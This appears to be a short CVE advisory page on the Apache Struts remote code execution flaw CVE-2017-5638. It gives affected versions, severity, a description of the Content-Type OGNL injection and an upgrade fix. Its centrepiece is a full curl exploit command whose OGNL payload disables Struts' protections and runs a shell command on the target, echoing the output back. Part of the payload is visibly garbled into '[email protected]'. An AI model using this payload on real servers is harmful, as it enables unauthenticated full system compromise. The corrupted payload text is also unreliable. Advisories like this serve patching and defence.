Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The CVE-2017-5638 vulnerability exists in the Jakarta Multipart parser of Apache Struts. When a file upload request is sent to a Struts application, the framework incorrectly handles the `Content-Type` header. An attacker can craft a malicious `Content-Type` value containing Object-Graph Navigation Language (OGNL) expressions. Due to flawed exception handling, the framework evaluates these expressions during the file upload process. This occurs because the error message, which incorporates the malicious header value, is parsed by the OGNL engine. This evaluation happens before any application-specific validation, allowing unauthenticated remote code execution. The attacker’s OGNL payload is executed with the same privileges as the Struts application server, leading to full system compromise.

DailyCVE Form:

Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical

date: 2017-03-07

Prediction: 2017-03-10

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target/upload.action`

How Exploit:

Craft malicious HTTP request with OGNL in Content-Type header.

Protection from this CVE:

Upgrade to Struts 2.3.32 or 2.5.10.1.

Impact:

Remote system compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top